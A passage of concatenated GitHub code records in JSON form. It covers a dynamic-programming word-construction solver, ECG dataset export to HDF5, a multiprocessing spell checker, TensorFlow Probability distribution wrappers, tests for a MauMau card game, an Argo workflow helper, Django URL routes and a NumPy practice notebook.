`word_bank array.\n\n# You may reuse elements of word_bank as many times as needed.\n\ndef can_construct(target, word_bank):\n tab = [False for _ in range(len(target) + 1)]\n tab[0] = True\n i = 0\n while i <= len(target):\n if tab[i] == True:\n for word in word_bank:\n # if the word matches the character starting at position i\n if i + len(word) <= len(target) and target[i:].startswith(word):\n tab[i + len(word)] = True\n i += 1\n return tab[len(target)]\n\n# m = len(target)\n# n = len(word_bank)\n# Time: O(m*n*m) -> (m^2 * n)\n# Space: O(m)\n\nprint(can_construct(\"abcdef\", [\"ab\", \"abc\", \"cd\", \"def\", \"abcd\"]))\nprint(can_construct(\"skateboard\", [\"bo\", \"rd\", \"ate\", \"t\", \"ska\", \"sk\", \"boar\"]))\nprint(can_construct(\"enterapotentpot\", [\"a\", \"p\", \"ent\", \"enter\", \"ot\", \"o\", \"t\"]))\nprint(can_construct(\"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef\", [\"e\", \"ee\", \"eee\", \"eeee\", \"eeeee\", \"eeeeee\"]))\n","repo_name":"matt-morales/interview_examples","sub_path":"algos_practice/dynamic_programming/tabulation/can_construct.py","file_name":"can_construct.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71737958123","text":"import os\nimport glob\nimport json\nimport logging\nfrom typing import List, Union\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport wfdb.processing\nfrom tqdm import tqdm, trange\n\nfrom ecg_transformer.util import *\nimport ecg_transformer.util.ecg as ecg_util\n\n\ndef fix_g12ec_headers():\n \"\"\"\n The 1st row of header files in G12EC datasets has an extra `.mat` in the record name\n \"\"\"\n recs = ecg_util.get_rec_paths('G12EC')\n ic(recs[:5], len(recs))\n for r in recs:\n r = r.removesuffix('.mat') + '.hea'\n with open(r, 'r') as f:\n lns = f.readlines()\n lns[0] = remove_1st_occurrence(lns[0], '.mat')\n with open(r, 'w') as f:\n f.write(''.join(lns))\n\n\nclass RecDataExport:\n \"\"\"\n Integrate & export the 12-lead ECG datasets collected, in standardized format `hdf5`\n\n See the MATLAB versions for exporting denoised signals\n \"\"\"\n\n def __init__(self, fqs=250):\n \"\"\"\n :param fqs: (Potentially re-sampling) frequency\n \"\"\"\n self.path_exp = os.path.join(PATH_BASE, DIR_DSET, config('datasets.my.dir_nm'))\n\n self.lbl_cols = ['dataset', 'patient_name', 'record_name', 'record_path']\n self.fqs = fqs\n\n self.logger = None\n\n def __call__(self, resample: Union[str, bool] = False):\n self.logger: logging.Logger = get_logger('ECG Record Export')\n dnms = config('datasets-export.total')\n self._log_info(f'Exporting ECG records on datasets {logi(dnms)}... ')\n # self.export_record_info()\n # for dnm in dnms:\n for dnm in dnms[1:2]:\n self.export_record_data(dnm, resample=resample)\n # self.export_record_data('CHAP_SHAO', resample) # TODO: debugging\n\n @staticmethod\n def get_rec_nms(dnm):\n d_dset = config(f'datasets.{dnm}')\n return sorted(\n glob.iglob(os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'], d_dset['rec_fmt']), recursive=True)\n )\n\n def get_dset_record_info(self, dnm, return_df=True) -> Union[pd.DataFrame, List[List]]:\n d_dset = config(f'datasets.{dnm}')\n dir_nm = d_dset['dir_nm']\n path_ = os.path.join(PATH_BASE, DIR_DSET, dir_nm)\n\n def get_get_pat_num():\n def incart(fnm_):\n path_no_ext = fnm_[:fnm_.index('.')]\n rec = wfdb.rdrecord(path_no_ext, sampto=1) # Don't need to see the signal\n return rec.comments[1]\n\n def ptb_xl(path_r_no_dset):\n if not hasattr(ptb_xl, 'df__'):\n ptb_xl.df__ = pd.read_csv(\n os.path.join(path_, 'ptbxl_database.csv'), usecols=['patient_id', 'filename_hr']\n )\n return int(ptb_xl.df__[ptb_xl.df__.filename_hr == path_r_no_dset].iloc[0]['patient_id'])\n\n def ptb_diagnostic(rec_nm):\n if not hasattr(ptb_diagnostic, 'df__'):\n fnm_ = config(f'{DIR_DSET}.{dnm}.path_label')\n with open(os.path.join(PATH_BASE, DIR_DSET, dir_nm, fnm_)) as f:\n ptb_diagnostic.df__ = pd.DataFrame(\n [ln.split('/') for ln in map(str.strip, f.readlines())],\n columns=['patient_nm', 'rec_nm']\n )\n return ptb_diagnostic.df__[ptb_diagnostic.df__.rec_nm == rec_nm].iloc[0]['patient_nm']\n\n def one2one():\n \"\"\" From dataset description, we have one-to-one mapping of patient to record \"\"\"\n if not hasattr(one2one, 'n'):\n one2one.n = 0\n n = one2one.n\n one2one.n += 1\n return n\n\n def na():\n if not hasattr(na, 'nan'):\n na.nan = float('nan')\n return na.nan\n\n d_f = {\n 'INCART': incart,\n 'PTB-XL': ptb_xl,\n 'PTB-Diagnostic': ptb_diagnostic,\n 'CSPC-CinC': one2one,\n 'CSPC-Extra-CinC': na, # Unknown, suspect multiple records for a single patient\n 'G12EC': na, # Patient info not available & multiple records for a single patient\n 'CHAP-SHAO': one2one,\n 'CODE-TEST': one2one\n }\n return d_f[dnm]\n\n get_pat_num = get_get_pat_num()\n\n def get_relative_path_n_name(fnm_):\n \"\"\"\n :return: 2-tuple of from (`datasets` to record file name], and file name without extension\n \"\"\"\n path_r = fnm_.split('/')\n return '/'.join(path_r[path_r.index(dir_nm):-1]), Path(fnm_).stem\n\n def get_row(fnm_):\n path_r, rec_nm = get_relative_path_n_name(fnm_)\n d_args = {\n 'INCART': [fnm_],\n 'PTB-XL': [f'{path_r}/{rec_nm}'[len(dnm)+1:]],\n 'PTB-Diagnostic': [rec_nm],\n 'CSPC-CinC': [],\n 'CSPC-Extra-CinC': [],\n 'G12EC': [],\n 'CHAP-SHAO': []\n }\n pat_nm = get_pat_num(*d_args[dnm])\n return [dnm, pat_nm, rec_nm, path_r]\n\n def get_row_code_test(rec_nms_):\n assert len(rec_nms_) == 1 # Only 1 hdf5 file\n fnm_ = rec_nms_[0]\n path_r, rec_nm = get_relative_path_n_name(fnm_)\n n_pat = h5py.File(fnm_, 'r')['tracings'].shape[0]\n rows_ = []\n for i in trange(n_pat, desc='CODE-TEST', unit='rec'):\n rows_.append([dnm, i, rec_nm, path_r])\n return rows_\n\n self._log_info(f'Getting record info for {logi(dnm)}... ')\n rec_nms = self.get_rec_nms(dnm)\n if dnm == 'CODE-TEST':\n rows = get_row_code_test(rec_nms)\n else:\n rows = []\n for fnm in tqdm(rec_nms, desc=dnm, unit='rec'):\n rows.append(get_row(fnm))\n return pd.DataFrame(rows, columns=self.lbl_cols) if return_df else rows\n\n def export_record_info(self):\n self._log_info(f'Exporting dataset record info... ')\n df = pd.DataFrame(\n sum([self.get_dset_record_info(dnm, return_df=False) for dnm in config('datasets-export.total')], start=[]),\n columns=self.lbl_cols\n )\n df = df.apply(lambda x: x.astype('category'))\n fnm = os.path.join(self.path_exp, config('datasets.my.fnm_labels'))\n df.to_csv(fnm)\n self._log_info(f'ECG record info exported to {logi(fnm)}')\n\n def _log_info(self, msg):\n if self.logger is not None:\n self.logger.info(msg)\n\n def export_record_data(self, dnm, resample: Union[bool, str] = True):\n \"\"\"\n :param dnm: Dataset name\n :param resample: If true, resample to export `fqs`\n If `single`, keep *only* the resampled copy\n \"\"\"\n if self.logger is not None:\n self.logger.info(f'Exporting {logi(dnm)} data... ')\n assert dnm in config('datasets-export.total')\n\n rec_nms = self.get_rec_nms(dnm)\n # rec_nms = rec_nms[:1024] # TODO: debugging\n sigs = np.stack(batched_conc_map(\n lambda fnms_, s_, e_: [ecg_util.fnm2sigs(nm_, dnm) for nm_ in fnms_[s_:e_]], rec_nms)\n )\n # ic(sigs, sigs.shape, sigs.dtype)\n fqs = config(f'datasets.{dnm}.fqs')\n d_rec = dict(n=len(rec_nms), shape=sigs.shape, dtype=sigs.dtype, frequency=fqs)\n self._log_info(f'Loaded record data: {log_dict(d_rec)}')\n shape = sigs.shape\n assert len(shape) == 3 and shape[0] == len(rec_nms) and shape[1] == 12\n assert not np.isnan(sigs).any()\n\n _resample = resample and self.fqs != fqs\n sigs_ = []\n if _resample:\n def _resampler(sig: np.array) -> np.array: # `resample_sig` seems to work with 1D signal only\n return wfdb.processing.resample_sig(sig, fqs, self.fqs)[0]\n\n def resampler(sigs__: np.ndarray) -> np.ndarray:\n return np.stack([_resampler(sig) for sig in sigs__])\n self._log_info(f'Resampling to {logi(self.fqs)}Hz... ')\n lst_sigs = []\n for s in tqdm(sigs, desc='Resampling', unit='rec'):\n lst_sigs.append(resampler(s))\n sigs_ = np.stack(lst_sigs)\n fqs = self.fqs\n dsets = dict(data=sigs_ if resample else sigs)\n if _resample and resample != 'single':\n dsets['ori'] = sigs\n attrs = dict(dnm=dnm, fqs=fqs, resampled=resample)\n # ic(type(resample))\n fnm = os.path.join(self.path_exp, config('datasets.my.rec_fmt') % dnm)\n self._log_info(f'Writing processed signals to {logi(fnm)}...')\n open(fnm, 'a').close() # Create file in OS\n fl = h5py.File(fnm, 'w')\n fl.attrs['meta'] = json.dumps(attrs)\n # TODO: reduce memory usage\n self._log_info(f'Metadata attributes {logi(list(fl.attrs.keys()))} added')\n for nm, data in dsets.items():\n fl.create_dataset(nm, data=data)\n self._log_info(f'HDF5 dataset on {logi(dnm)} with splits {logi([nm for nm in fl])} written to file ')\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n from icecream import ic\n\n np.random.seed(config('random-seed'))\n # fix_g12ec_headers()\n\n def export():\n de = RecDataExport(fqs=250)\n de(resample='single')\n # export()\n\n def sanity_check():\n \"\"\"\n Check the MATLAB h5 output working properly\n \"\"\"\n dnm = 'CHAP_SHAO'\n d_dset = config(f'datasets.my')\n path_exp = os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'])\n fnm = os.path.join(path_exp, d_dset['rec_fmt_denoised'] % dnm)\n ic(fnm)\n rec = h5py.File(fnm, 'r')\n ic(rec, list(rec.keys()), list(rec.attrs))\n\n data = rec['data']\n ic(type(data), data.shape, data[0, :3, :5])\n ic(rec.attrs['meta'])\n\n # Check which signal is denoised, those not-yet denoised are filled with 0\n idx_filled = np.array([not np.all(d == 0) for d in data])\n ic(idx_filled.shape, idx_filled[:10])\n ic(np.count_nonzero(idx_filled))\n # sanity_check()\n\n def check_matlab_out():\n \"\"\"\n Check the MATLAB data processing output quality\n \"\"\"\n from matplotlib.widgets import Button\n\n # dnm = 'CHAP_SHAO'\n dnm = 'PTB-XL'\n d_dset = config(f'datasets.my')\n path_exp = os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'])\n rec_ori = h5py.File(os.path.join(path_exp, d_dset['rec_fmt'] % dnm), 'r')\n rec_den = h5py.File(os.path.join(path_exp, d_dset['rec_fmt_denoised'] % dnm), 'r')\n data_den, data_ori = rec_den['data'], rec_ori['data'] # Share frequency\n ic(data_ori.shape)\n n_sig, n_ch, l_ch = data_ori.shape\n\n # sig, truth_denoised = ecg_util.get_nlm_denoise_truth(verbose=False)[:2]\n # ic(sig[:10], truth_denoised[:10], sig.shape)\n # ecg_util.plot_1d(\n # [sig, truth_denoised],\n # label=['Original, resampled', 'Denoised'],\n # title=f'[{dnm}] output generated from dataset',\n # # e=2**11\n # )\n\n # Pick a channel randomly\n def _step(s, c):\n plt.cla()\n ecg_util.plot_1d(\n [data_ori[s, c], data_den[s, c]],\n label=['Original, resampled', 'Denoised'],\n title=f'[{dnm}] Processed Signal random plot: signal {s+1} channel {c+1}',\n new_fig=False,\n show=False,\n # e=2**10\n )\n plt.draw()\n\n class PlotFrame:\n def __init__(self, i=0, n_s=n_sig, n_c=n_ch):\n self.n_s = n_s # TODO: until full dataset ready\n self.n_s = 1024\n self.n_c = n_c\n n = self.n_s * self.n_c\n self.idxs = np.arange(n)\n np.random.shuffle(self.idxs)\n\n self.idx = i\n self.clp = clipper(0, n-1)\n self._set_curr_idx()\n\n def _set_curr_idx(self):\n self.i_s, self.i_c = self.idxs[self.idx] // self.n_c, self.idxs[self.idx] % self.n_c\n\n def next(self, event):\n prev_idx = self.idx\n self.idx = self.clp(self.idx+1)\n if prev_idx != self.idx:\n self._set_curr_idx()\n _step(self.i_s, self.i_c)\n\n def prev(self, event):\n prev_idx = self.idx\n self.idx = self.clp(self.idx-1)\n if prev_idx != self.idx:\n self._set_curr_idx()\n _step(self.i_s, self.i_c)\n\n plt.figure(figsize=(18, 6))\n\n init = 0\n pf = PlotFrame(i=init)\n ax = plt.gca()\n btn_next = Button(plt.axes([0.81, 0.05, 0.1, 0.075]), 'Next')\n btn_next.on_clicked(pf.next)\n btn_prev = Button(plt.axes([0.7, 0.05, 0.1, 0.075]), 'Previous')\n btn_prev.on_clicked(pf.prev)\n plt.sca(ax)\n\n # _step(pf.i_s, pf.i_c)\n _step(77, 0)\n plt.show()\n # check_matlab_out()\n\n def exported_to_fp32():\n \"\"\"\n Save disk space on colab, and processing anyway, convert the MATLAB-denoised dataset from fp64 to fp32\n \"\"\"\n fnm = 'PTB-XL-denoised'\n fnm_out = f'{fnm}, fp32'\n fnm = os.path.join(ecg_util.get_processed_path(), f'{fnm}.hdf5')\n fnm_out = os.path.join(ecg_util.get_processed_path(), f'{fnm_out}.hdf5')\n\n rec = h5py.File(fnm, 'r')\n assert list(rec.attrs.keys()) == ['meta'] and list(rec.keys()) == ['data'] and rec['data'].dtype == np.float64\n\n rec_out = h5py.File(fnm_out, 'w')\n rec_out.attrs['meta'] = rec.attrs['meta']\n rec_out.create_dataset('data', data=rec['data'], dtype=np.float32)\n ic(rec_out.attrs['meta'], rec_out.keys())\n # exported_to_fp32()\n\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/preprocess/data_export.py","file_name":"data_export.py","file_ext":"py","file_size_in_byte":13899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"30782539151","text":"import readWords\nimport editDistance\nimport multiprocessing\n\npath = \"english_words.txt\"\n\n\ndef chunk_list(my_word, chunk_size):\n chunk_size = len(my_word) // chunk_size\n return [my_word[i:i + chunk_size] for i in range(0, len(my_word), chunk_size)]\n\n\ndef spell_checker(list_words):\n min_distance = 999999\n suggestion = None\n for word in list_words:\n distance = editDistance.dynamic_soln(word, myword)\n if distance < min_distance:\n suggestion = word\n min_distance = distance\n return suggestion\n\n\nlistOfWords = readWords.read_files(path)\nmyword = input(\"Please input the word \")\nif __name__ == '__main__':\n\n pool = multiprocessing.Pool()\n\n resultList = pool.map(spell_checker, chunk_list(listOfWords, 500))\n\n print(\"Correct spell is\", spell_checker(resultList))\n\n# print \"Suggestion is\",suggestion\n","repo_name":"sankalpbhandari/Spell-Checker","sub_path":"spellChecker.py","file_name":"spellChecker.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38618439289","text":"from tensorflow_probability import distributions as _distributions\n\nfrom .poe import PoE\nfrom .mvn import MultivariateNormalFullCovarianceML, MultivariateNormalFullPrecision, MultivariateNormalIso\nfrom .soft_uniform import SoftUniformNormalCdf, SoftUniform\n# import from tensorflow_probability\nfrom . import approx\n\n\nclass MultivariateNormalFullCovariance(_distributions.MultivariateNormalFullCovariance):\n\tdef __init__(self,\n\t\t\t\t loc=None,\n\t\t\t\t covariance_matrix=None,\n\t\t\t\t validate_args=False,\n\t\t\t\t allow_nan_stats=True,\n\t\t\t\t name=\"MultivariateNormalFullCovariance\"):\n\n\t\tself._covariance_matrix = covariance_matrix\n\n\t\t_distributions.MultivariateNormalFullCovariance.__init__(\n\t\t\tself,\n\t\t\tloc,\n\t\t\tcovariance_matrix,\n\t\t\tvalidate_args,\n\t\t\tallow_nan_stats,\n\t\t\tname=name\n\t\t)\n\n\t@property\n\tdef covariance_matrix(self):\n\t\treturn self._covariance_matrix\n\nCategorical = _distributions.Categorical\nMultivariateNormalDiag = _distributions.MultivariateNormalDiag\nMultivariateNormalTriL = _distributions.MultivariateNormalTriL\ntry:\n\tWishart = _distributions.Wishart\nexcept:\n\tWishart = None\nLogNormal = _distributions.LogNormal\nStudentT = _distributions.StudentT\nNormal = _distributions.Normal\nUniform = _distributions.Uniform\n\n\nfrom .mixture_models import *","repo_name":"teguhSL/learning_distribution_gan","sub_path":"tf_robot_learning/tf_robot_learning/distributions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"12155225275","text":"def permute1(start, rest):\n res = []\n if len(rest) <= 1:\n res += [start + rest, rest + start]\n else:\n for i, c in enumerate(rest):\n s = rest[:i] + rest[i+1:]\n for perm in permute1(c, s):\n res += [start + perm]\n return res\n\n\n\nprint(permute1('', 'google'))","repo_name":"defjam903/Google-Interview-prep","sub_path":"Basics/Sample Run.py","file_name":"Sample Run.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"19"} +{"seq_id":"28270582259","text":"import random\n\nimport pytest\n\nfrom .maumau import MauMau\n\n\n@pytest.fixture\ndef default_game():\n random.seed(2)\n return MauMau(\"g1\", [\"p1\", \"p2\"])\n\n\ndef test_new(default_game):\n g = default_game\n assert (\n len(g.playing_stack)\n + len(g.stack)\n + sum([len(p.cards) for p in g.players.values()])\n == 32\n )\n assert g.status(\"p1\")\n\n\ndef test_full_game(default_game):\n g = default_game\n g.status(\"p1\")\n g.status(\"p2\")\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.status(\"p1\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n g.action(\"p1\", \"play_card\", \"S-7\")\n g.action(\"p2\", \"play_card\", \"H-7\")\n g.action(\"p1\", \"take_card\")\n g.action(\"p1\", \"play_card\")\n g.status(\"p1\")\n g.status(\"p2\")\n g.action(\"p2\", \"play_card\", \"H-7\")\n g.action(\"p2\", \"play_card\", \"H-J\")\n g.action(\"p1\", \"take_card\")\n g.action(\"p1\", \"keep_card\")\n g.status(\"p2\")\n assert g.status(\"p2\").get(\"winner\") is None\n g.action(\"p2\", \"play_card\", \"H-A\")\n assert g.status(\"p2\").get(\"winner\") == \"p2\"\n g.status(\"p2\")\n g.action(\"p1\", \"play_card\")\n g.action(\"p2\", \"play_card\")\n assert g.status(\"p2\").get(\"winner\") == \"p2\"\n assert g.status(\"p1\").get(\"your_deck\") == [\n \"C-8\",\n \"C-A\",\n \"C-Q\",\n \"S-8\",\n \"S-K\",\n \"C-J\",\n \"D-A\",\n \"D-J\",\n ]\n\n\ndef test_illegal_moves(default_game):\n g = default_game\n g.action(\"p2\", \"play_card\", \"D-9\"),\n g.action(\"p1\", \"play_card\", \"C-Q\"),\n g.action(\"p2\", \"play_card\", \"A-A\"),\n g.action(\"p2\", \"play_card\", \"XX\"),\n\n\ndef test_check_card(default_game):\n g = default_game\n assert g.status(\"p2\")[\"deck_top\"] == \"D-K\"\n assert g.check_card(\"A-B\") == None\n assert g.check_card(\"D-9\") == True\n assert g.check_card(\"H-9\") == False\n\n\ndef test_take_all_cards(default_game):\n g = default_game\n assert len(g.stack) == len(g.allowed_cards) - len(g.players) * 5 - 1\n assert len(list(g.pick_cards(1))) == 1\n\n # one card on playing stack\n assert len(g.playing_stack) == 1\n assert g.status(\"p1\").get(\"deck_top\") == \"D-K\"\n # take 18 cards\n lots_of_cards = list(g.pick_cards(18))\n assert len(lots_of_cards) == 18\n # play 18 cards on top of the deck\n g.playing_stack.extend(lots_of_cards)\n assert len(g.playing_stack) == 1 + 18\n assert g.status(\"p1\").get(\"deck_top\") == \"C-K\"\n\n assert len(g.stack) == 2\n # take more cards than in there:\n # 2 (from stack); 1 from playing_stack\n assert len(list(g.pick_cards(3))) == 3\n # reshuffle from playing_stack happend\n assert len(g.stack) == 17\n assert len(g.playing_stack) == 1\n # the same card is still on top in the playing stack\n assert g.status(\"p1\").get(\"deck_top\") == \"C-K\"\n\n\ndef test_special_7a(default_game):\n g = default_game\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n # play cards until ?-7 is possible\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n\n # play first 7\n g.action(\"p1\", \"play_card\", \"S-7\")\n assert len(g.players[\"p1\"].cards) == 3\n # play 7 against\n g.action(\"p2\", \"play_card\", \"H-7\")\n # \"p1\" has no ?-7 so will get 4 cards\n g.action(\"p1\", \"take_card\")\n assert len(g.players[\"p1\"].cards) == 3 + 2 + 2\n\n\ndef test_special_7b(default_game):\n g = default_game\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n # play cards until ?-7 is possible\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n\n # play first 7\n g.action(\"p1\", \"play_card\", \"S-7\")\n assert len(g.players[\"p2\"].cards) == 3\n assert g.status(\"p2\").get(\"your_turn\")\n # don't play 7 - but something else\n g.action(\"p2\", \"play_card\", \"H-A\")\n # no card was played, but a message to take_cards\n assert g.status(\"p2\").get(\"your_turn\")\n g.action(\"p2\", \"take_cards\")\n # the cards can be played, so still in_flow\n assert len(g.players[\"p2\"].cards) == 3\n # play one of the 2 cards\n assert \"specify\" in g.action(\"p2\", \"play_card\").get(\"msg\")\n # the error message tells us, to specify one\n g.action(\"p2\", \"play_card\", \"S-8\")\n\n # \"p2\" has not played a 7, but played a card so it has 1 more card\n assert len(g.status(\"p2\").get(\"your_deck\")) == 3 + 1\n # because of the 8 one more card to play\n g.action(\"p2\", \"play_card\", \"S-K\")\n assert len(g.players[\"p2\"].cards) == 3\n # turn ends\n assert g.status(\"p2\").get(\"current_player\") == \"p1\"\n\n\ndef test_special_8(default_game):\n g = default_game\n g.current_player = \"p1\"\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n assert g.status(\"p1\").get(\"deck_top\") == \"D-K\"\n # take cards until C-? is on top\n while True:\n c = next(g.pick_cards(1))\n g.playing_stack.extend([c])\n if c[0] == \"C\":\n break\n assert len(g.playing_stack) == 4\n assert g.status(\"p2\").get(\"deck_top\") == \"C-J\"\n\n # play ?-8\n assert g.status(\"p1\").get(\"your_turn\")\n g.action(\"p1\", \"play_card\", \"C-8\")\n # p2 was deferred\n assert g.status(\"p1\").get(\"your_turn\")\n","repo_name":"mfa/cardgames","sub_path":"app/games/test_maumau.py","file_name":"test_maumau.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3402847671","text":"import contextlib\nfrom argo_workflow_tools.dsl import building_mode_context as context\nfrom argo_workflow_tools.dsl.input_definition import InputDefinition, SourceType\n\ndef merge_conditional_results(*args) -> InputDefinition:\n if not context.dag_building_mode.get():\n for arg in args:\n if arg:\n return arg\n return None\n else:\n values = \"\"\n for arg in args:\n values += f\"tasks['{arg.source_node_id}'].outputs != nil ? tasks['{arg.source_node_id}'].outputs.parameters.result : \"\n values += \"nil\"\n return InputDefinition(name=\"merge_result\", source_type=SourceType.NODE_OUTPUT, value=values, is_expression=True)\n","repo_name":"DiagnosticRobotics/argo-workflow-tools","sub_path":"argo_workflow_tools/merge_result.py","file_name":"merge_result.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"19"} +{"seq_id":"42695448937","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\n\nfrom commons import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register('account', views.AccountViewSet)\nrouter.register('organization', views.OrganizationViewSet)\nrouter.register('pamu', views.PamuViewSet)\nrouter.register('fssu', views.FssuViewSet)\nrouter.register('unit', views.UnitViewSet)\nrouter.register('serviceability', views.ServiceabilityViewSet)\nrouter.register('acquisition_mode', views.AcquisitionModeViewSet)\nrouter.register('region', views.RegionViewSet)\nrouter.register('procurement_mode', views.ProcurementModeViewSet)\nrouter.register('sprs', views.SprsViewSet)\n\n\nurlpatterns = [\n url(r'^commons/', include(router.urls)),\n url(r'^my_profile/$', views.my_profile),\n url(r'^commons/geographical_location/$', views.get_geographical_location),\n url(r'^commons/quarter/$', views.get_quarter)\n]\n","repo_name":"marvskie/palmis","sub_path":"commons/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5689186358","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Numpy_Assignment_2::\n\n# ## Question:1\n\n# ### Convert a 1D array to a 2D array with 2 rows?\n\n# #### Desired output::\n\n# array([[0, 1, 2, 3, 4],\n# [5, 6, 7, 8, 9]])\n\n# In[2]:\n\n\nimport numpy as np\n\n\n# In[3]:\n\n\nx=np.array([0,1,2,3,4,5,6,7,8,9])\nx\n\n\n# In[4]:\n\n\nx.ndim\n\n\n# In[5]:\n\n\nx=np.reshape(x,(2,5))\nx\n\n\n# In[6]:\n\n\nx.ndim\n\n\n# ## Question:2\n\n# ### How to stack two arrays vertically?\n\n# #### Desired Output::\narray([[0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1]])\n# In[7]:\n\n\na=np.array([0,1,2,3,4,5,6,7,8,9])\nb=np.array([10,11,12,13,14,15,16,17,18,19])\n\n\n# In[8]:\n\n\na=np.reshape(a,(2,5))\nb=np.reshape(b,(2,5))\n\n\n# In[9]:\n\n\nnp.vstack((a,b))\n\n\n# ## Question:3\n\n# ### How to stack two arrays horizontally?\n\n# #### Desired Output::\narray([[0, 1, 2, 3, 4, 1, 1, 1, 1, 1],\n [5, 6, 7, 8, 9, 1, 1, 1, 1, 1]])\n# In[10]:\n\n\nx=np.array([0,1,2,3,4,5,6,7,8,9])\ny=np.array([10,11,12,13,14,15,16,17,18,19])\n\n\n# In[11]:\n\n\nnp.vstack((x,y))\n\n\n# ## Question:4\n\n# ### How to convert an array of arrays into a flat 1d array?\n\n# #### Desired Output::\narray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n# In[12]:\n\n\nf=np.vstack((a,b))\n\nnp.ravel(f)\n\n\n# ## Question:5\n\n# ### How to Convert higher dimension into one dimension?\n\n# #### Desired Output::\narray([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])\n# In[13]:\n\n\nnp.array([[0, 1, 2, 3, 4, 1, 1, 1, 1, 1],\n [5, 6, 7, 8, 9, 1, 1, 1, 1, 1]]).ravel()\n\n\n# ## Question:6\n\n# ### Convert one dimension to higher dimension?\n\n# #### Desired Output::\narray([[ 0, 1, 2],\n[ 3, 4, 5],\n[ 6, 7, 8],\n[ 9, 10, 11],\n[12, 13, 14]])\n# In[14]:\n\n\nnp.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]).reshape(5,3)\n\n\n# ## Question:7\n\n# ### Create 5x5 an array and find the square of an array?\n\n# In[15]:\n\n\nx=np.random.randn(25).reshape(5,5)*5\nnp.array(x)\nx=np.square(x)\nx\n\n\n# ## Question:8\n\n# ### Create 5x6 an array and find the mean?\n\n# In[16]:\n\n\nx=np.random.randn(25).reshape(5,5)*5\nx=np.array(x)\nm=np.mean(x)\nm\n\n\n# In[17]:\n\n\nx\n\n\n# ## Question:9\n\n# ### Find the standard deviation of the previous array in Q8?\n\n# In[18]:\n\n\nnp.std(x)\n\n\n# ## Question:10\n\n# ### Find the median of the previous array in Q8?\n\n# In[19]:\n\n\nnp.median(x)\n\n\n# ## Question:11\n\n# ### Find the transpose of the previous array in Q8?\n\n# In[20]:\n\n\nx\n\n\n# In[21]:\n\n\nx.T\n\n\n# ## Question:12\n\n# ### Create a 4x4 an array and find the sum of diagonal elements?\n\n# In[22]:\n\n\nx=np.random.randn(16).reshape(4,4)*5\nx=np.array(x)\nx\n\n\n# In[23]:\n\n\nnp.diagonal(x)\n\n\n# In[24]:\n\n\nnp.diagonal(x).sum()\n\n\n# ## Question:13\n\n# ### Find the determinant of the previous array in Q12?\n\n# In[25]:\n\n\nx\n\n\n# In[26]:\n\n\nx.shape\n\n\n# In[27]:\n\n\nnp.linalg.det(x)\n\n\n# ## Question:14\n\n# ### Find the 5th and 95th percentile of an array?\n\n# In[28]:\n\n\nx\n\n\n# In[29]:\n\n\nprint(\"5th percentile\",np.percentile(x, 5))\nprint(\"95th percentile\",np.percentile(x, 95))\n\n\n# ## Question:15\n\n# ### How to find if a given array has any null values?\n\n# In[30]:\n\n\nb = np.arange(25).reshape(5, 5) \n \nprint(\"\\nIs NaN: \\n\", np.isnan(b)) \n \nc = [[1,2,3], \n [np.nan,2,2]] \nprint(\"\\nIs NaN: \\n\", np.isnan(c))\n\n\n# In[ 